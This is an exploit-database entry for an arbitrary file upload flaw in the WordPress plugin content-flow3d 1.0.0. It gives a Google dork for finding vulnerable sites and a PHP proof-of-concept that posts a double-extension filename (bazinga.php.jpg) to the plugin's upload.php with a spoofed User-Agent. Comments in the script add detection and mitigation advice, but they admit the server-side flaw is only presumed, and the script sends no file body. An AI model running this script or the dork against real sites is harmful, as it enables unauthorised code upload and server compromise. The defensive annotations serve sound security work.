WordPress Plugin Content Flow 3D 1.0.0 - Arbitrary File Upload

EDB-ID:

19036

CVE:

N/A


Author:

g11tch

Type:

webapps


Platform:

PHP

Date:

2012-06-10


# Exploit Title: WordPress content-flow3d Arbitrary File Upload
# Google Dork: inurl:plugins/content-flow3d/
# Date: 10June2012
# Exploit Author: g11tch
# Vendor Homepage: http://wordpress.org/extend/plugins/content-flow3d/
# Software Link: downloads.wordpress.org/plugin/content-flow3d.zip
# Version: 1.0.0
# Tested on: CentOS, Ubuntu Server 11.04

Greets in no particular order
pfizer.inc   for the constant motivation
pr1me, The_Eccentric, Spridel, Hackett, DrB0n3z, 
merci Sammy Forgit pour l'expression correcte
###############################################

#!/usr/bin/php -f
<?php
/*
 * Proof-of-concept request against the upload.php handler of the
 * content-flow3d WordPress plugin (version 1.0.0 per the header on this page).
 *
 * What the script does: it sends one HTTP POST to http://<target>/upload.php
 * carrying a single form field, qqfile, whose value is a double-extension
 * filename, and prints whatever the server answers. Because the POST fields
 * are passed as an array, curl encodes the body as multipart/form-data.
 *
 * The vulnerable server-side code is not shown on this page.
 * NOTE(review): presumably the handler builds the stored filename from qqfile
 * without checking the extension against an allow-list -- confirm against the
 * plugin source before relying on this description.
 *
 * For defenders:
 *  - Detection: POST requests to upload.php under the plugin directory,
 *    request parameters or stored files whose name has an executable
 *    extension before an image one (*.php.jpg), and the legacy MSIE 5.01
 *    User-Agent string set below.
 *  - Mitigation: remove or disable the plugin unless a fixed release is
 *    confirmed, deny script execution in upload directories, and validate the
 *    final extension and the content type on the server.
 */

// Target prefix is taken verbatim from the first command-line argument; it is
// interpolated into both the URL and the cookie-jar path without validation.
$target = $argv[1];

// The only field sent: a filename with a double extension.
$fields = [
    'qqfile' => "bazinga.php.jpg",
];

$handle = curl_init();

// Options are applied one by one, in this order.
$options = [
    CURLOPT_RETURNTRANSFER => 1,   // capture the response body instead of printing it
    CURLOPT_URL            => "http://$target/upload.php",
    CURLOPT_USERAGENT      => "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
    CURLOPT_POST           => 1,
    CURLOPT_POSTFIELDS     => $fields,
    CURLOPT_TIMEOUT        => 3,   // whole transfer capped at 3 seconds
    CURLOPT_LOW_SPEED_LIMIT => 3,  // abort when slower than 3 bytes/s ...
    CURLOPT_LOW_SPEED_TIME => 3,   // ... for 3 seconds
    CURLOPT_COOKIEJAR      => "/tmp/cookie_$target", // predictable path under /tmp
];
foreach ($options as $option => $value) {
    curl_setopt($handle, $option, $value);
}

$response = curl_exec($handle);
curl_close($handle);
unset($handle);

// Raw server reply (nothing is printed when the request failed).
echo $response;
?>